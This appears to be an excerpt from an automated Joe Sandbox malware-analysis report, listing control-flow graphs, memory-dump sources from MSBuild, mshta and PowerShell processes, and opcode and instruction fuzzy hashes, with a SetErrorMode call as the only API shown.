                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Control-flow Graph

                                                                                                                            • Executed
                                                                                                                            • Not Executed
                                                                                                                            control_flow_graph 20 f023f4-f023ff 21 f02401-f0240e 20->21 22 f02412-f02417 20->22 21->22 23 f02419 22->23 24 f0241a 22->24 25 f02420-f02421 24->25
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000008.00000002.2396327569.0000000000F02000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F02000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_8_2_f02000_MSBuild.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: 0c1c62486b188533670420067133c620f1034ffd86fab354f7db92f5df3fb203
                                                                                                                            • Instruction ID: d8862765e0050a1fb48fb01badf9dc68880eb2565cd72081455b38154eab6369
                                                                                                                            • Opcode Fuzzy Hash: 0c1c62486b188533670420067133c620f1034ffd86fab354f7db92f5df3fb203
                                                                                                                            • Instruction Fuzzy Hash: 47D05E796056C14FD316DA1CC2ACB953BD4AB51724F4A44F9AC008B7A3C768E9C1E610
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Control-flow Graph

                                                                                                                            • Executed
                                                                                                                            • Not Executed
                                                                                                                            control_flow_graph 26 f023bc-f023c3 27 f023c5-f023d2 26->27 28 f023d6-f023db 26->28 27->28 29 f023e1 28->29 30 f023dd-f023e0 28->30 31 f023e7-f023e8 29->31
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000008.00000002.2396327569.0000000000F02000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F02000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_8_2_f02000_MSBuild.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: 90a54838a0c9518ab5600ff4744492d7a3c57a16b08f6710b9d47ece8175a7d1
                                                                                                                            • Instruction ID: 5494113762944e986c2a66a3168c580f26f31560823e665761e86f2027c63586
                                                                                                                            • Opcode Fuzzy Hash: 90a54838a0c9518ab5600ff4744492d7a3c57a16b08f6710b9d47ece8175a7d1
                                                                                                                            • Instruction Fuzzy Hash: C4D05E346002814BCB15DA1CD2D8F5937D8AB40724F0644E8AC108B7A2C7B8E8C0EA10
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Execution Graph

                                                                                                                            Execution Coverage:4.3%
                                                                                                                            Dynamic/Decrypted Code Coverage:100%
                                                                                                                            Signature Coverage:0%
                                                                                                                            Total number of Nodes:7
                                                                                                                            Total number of Limit Nodes:1
                                                                                                                            execution_graph 300 170a230 301 170a25e SetErrorMode 300->301 303 170a29f 301->303 296 170a25e 297 170a2b3 296->297 298 170a28a SetErrorMode 296->298 297->298 299 170a29f 298->299

                                                                                                                            Callgraph

                                                                                                                            Control-flow Graph

                                                                                                                            • Executed
                                                                                                                            • Not Executed
                                                                                                                            control_flow_graph 0 170a230-170a288 2 170a2b3-170a2b8 0->2 3 170a28a-170a29d SetErrorMode 0->3 2->3 4 170a2ba-170a2bf 3->4 5 170a29f-170a2b2 3->5 4->5
                                                                                                                            APIs
                                                                                                                            • SetErrorMode.KERNELBASE(?), ref: 0170A290
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000009.00000002.2385274172.000000000170A000.00000040.00000800.00020000.00000000.sdmp, Offset: 0170A000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_9_2_170a000_MSBuild.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: ErrorMode
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 2340568224-0
                                                                                                                            • Opcode ID: aeb77ecb3a6b1d5870ff503e72ab446507b378c7c1cb357267e3aacc89e54790
                                                                                                                            • Instruction ID: fb4c39fe1df92929e3788e749437a64999af6ef25efe5c358c52dbc106a367a2
                                                                                                                            • Opcode Fuzzy Hash: aeb77ecb3a6b1d5870ff503e72ab446507b378c7c1cb357267e3aacc89e54790
                                                                                                                            • Instruction Fuzzy Hash: 79113D754093C09FDB128B15DD54A62BFB4DF47614F0880DAED858F2A3D265A908DB62
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Control-flow Graph

                                                                                                                            • Executed
                                                                                                                            • Not Executed
                                                                                                                            control_flow_graph 8 170a25e-170a288 9 170a2b3-170a2b8 8->9 10 170a28a-170a29d SetErrorMode 8->10 9->10 11 170a2ba-170a2bf 10->11 12 170a29f-170a2b2 10->12 11->12
                                                                                                                            APIs
                                                                                                                            • SetErrorMode.KERNELBASE(?), ref: 0170A290
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000009.00000002.2385274172.000000000170A000.00000040.00000800.00020000.00000000.sdmp, Offset: 0170A000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_9_2_170a000_MSBuild.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: ErrorMode
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 2340568224-0
                                                                                                                            • Opcode ID: 333406f59d37517a5bba8ab5758396a9be33cfa765bda280bad7a3f49175c878
                                                                                                                            • Instruction ID: 8e5a8e184fc1f793844f1af27e059be72aa349927b677dceafdb8f8e2e10272f
                                                                                                                            • Opcode Fuzzy Hash: 333406f59d37517a5bba8ab5758396a9be33cfa765bda280bad7a3f49175c878
                                                                                                                            • Instruction Fuzzy Hash: 2EF0AF35908740CFEB21CF45D988761FBE4EF48720F08C0AADD094B792D276A408CEA2
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Control-flow Graph

                                                                                                                            • Executed
                                                                                                                            • Not Executed
                                                                                                                            control_flow_graph 15 17905e0-1790603 16 1790606-1790620 15->16 17 1790626-1790643 16->17
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000009.00000002.2385612225.0000000001790000.00000040.00000020.00020000.00000000.sdmp, Offset: 01790000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_9_2_1790000_MSBuild.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: d552427335327c14f209dc5225fa2b13a09deb0d4fd4ad8f1008ee6f94283448
                                                                                                                            • Instruction ID: 35649bc41b5da8258bec8747f99857a336305453d284832e9bcae1f2536998d2
                                                                                                                            • Opcode Fuzzy Hash: d552427335327c14f209dc5225fa2b13a09deb0d4fd4ad8f1008ee6f94283448
                                                                                                                            • Instruction Fuzzy Hash: 400149B54087C06FC311CF45AC40893FFE8DF8623070985ABF8888B652C134B909CBA1
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Control-flow Graph

                                                                                                                            • Executed
                                                                                                                            • Not Executed
                                                                                                                            control_flow_graph 18 1790606-1790620 19 1790626-1790643 18->19
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000009.00000002.2385612225.0000000001790000.00000040.00000020.00020000.00000000.sdmp, Offset: 01790000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_9_2_1790000_MSBuild.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: 6df01a6210ffa787e13d7123b212bfadbff2159c48ce6f6fb09dc82f076e4062
                                                                                                                            • Instruction ID: 146b870f9c08a7651aa368889423e3a40faa452a28f6f230ee0166ff67fd4cd6
                                                                                                                            • Opcode Fuzzy Hash: 6df01a6210ffa787e13d7123b212bfadbff2159c48ce6f6fb09dc82f076e4062
                                                                                                                            • Instruction Fuzzy Hash: 46E092BAA006004B9650CF0AED85462F7D8EB88630708C47FDC0D8B701E235B508CAA6
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Control-flow Graph

                                                                                                                            • Executed
                                                                                                                            • Not Executed
                                                                                                                            control_flow_graph 20 17023f4-17023ff 21 1702401-170240e 20->21 22 1702412-1702417 20->22 21->22 23 1702419 22->23 24 170241a 22->24 25 1702420-1702421 24->25
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000009.00000002.2385237449.0000000001702000.00000040.00000800.00020000.00000000.sdmp, Offset: 01702000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_9_2_1702000_MSBuild.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: ced3a98cf0513dc28b8e7050369cb3814383f82155699200e06e894031b4ebbd
                                                                                                                            • Instruction ID: 5a5b14bf229f6893a745b63f15fd2fe9dffd5580dc99158ebca0fdb70731bba2
                                                                                                                            • Opcode Fuzzy Hash: ced3a98cf0513dc28b8e7050369cb3814383f82155699200e06e894031b4ebbd
                                                                                                                            • Instruction Fuzzy Hash: AFD05E7A3057C18FE3179A1CC2ACB957BE4AB51714F5B44F9AC008B7A3C768E9C1D600
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Control-flow Graph

                                                                                                                            • Executed
                                                                                                                            • Not Executed
                                                                                                                            control_flow_graph 26 17023bc-17023c3 27 17023c5-17023d2 26->27 28 17023d6-17023db 26->28 27->28 29 17023e1 28->29 30 17023dd-17023e0 28->30 31 17023e7-17023e8 29->31
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000009.00000002.2385237449.0000000001702000.00000040.00000800.00020000.00000000.sdmp, Offset: 01702000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_9_2_1702000_MSBuild.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: 6f14189d2cd4310252c3108181457fbf7458885c04358f44edc8d77d4711d7e8
                                                                                                                            • Instruction ID: 9a823e232656be30654bb1c42798389dab544698cc621f593f0d6002b6438aab
                                                                                                                            • Opcode Fuzzy Hash: 6f14189d2cd4310252c3108181457fbf7458885c04358f44edc8d77d4711d7e8
                                                                                                                            • Instruction Fuzzy Hash: AFD05E352002818BDB16DA1CD2D8F59BBD8AB40714F0644E8AC108B7A2C7B4E8C0CA00
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000E.00000003.2335927034.00000219E4D20000.00000010.00000800.00020000.00000000.sdmp, Offset: 00000219E4D20000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_14_3_219e4d20000_mshta.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: 1415cf9a5ff05e0c22260e06ba58a54442f36ca97d8c14ea786cf574e69d5164
                                                                                                                            • Instruction ID: f147db9a3c652110e0be141083f1ce4a33c80f550d8f7a3f4688eb66a2092fe4
                                                                                                                            • Opcode Fuzzy Hash: 1415cf9a5ff05e0c22260e06ba58a54442f36ca97d8c14ea786cf574e69d5164
                                                                                                                            • Instruction Fuzzy Hash: 399004144D540F55D41551D14C5D3DC504073DD150FD4C4C3C517D1544D44F13D711D7
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000F.00000002.2331221306.00007FF848F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F40000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_15_2_7ff848f40000_powershell.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: feb0186fa5a442a8601efe8cd9fda3dbab66340785de5c386d0276137d275872
                                                                                                                            • Instruction ID: a595da5180462ad958e9558f25a06545270c3b0d55f8ed8927ff596cfaa69e36
                                                                                                                            • Opcode Fuzzy Hash: feb0186fa5a442a8601efe8cd9fda3dbab66340785de5c386d0276137d275872
                                                                                                                            • Instruction Fuzzy Hash: E501677111CB0C4FD744EF0CE451AA5B7E0FB95364F10056EE58AC3695D736E881CB45
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000016.00000003.2651354954.000001F42A700000.00000010.00000800.00020000.00000000.sdmp, Offset: 000001F42A700000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_22_3_1f42a700000_mshta.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: 1415cf9a5ff05e0c22260e06ba58a54442f36ca97d8c14ea786cf574e69d5164
                                                                                                                            • Instruction ID: 88160856581e93bd4c85217e026876d4d8005e121cb2a26fc562442de97e79ff
                                                                                                                            • Opcode Fuzzy Hash: 1415cf9a5ff05e0c22260e06ba58a54442f36ca97d8c14ea786cf574e69d5164
                                                                                                                            • Instruction Fuzzy Hash: 7690021449540756D51455E11C452AD504163C8360FD444A1581690144D84D52972156
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%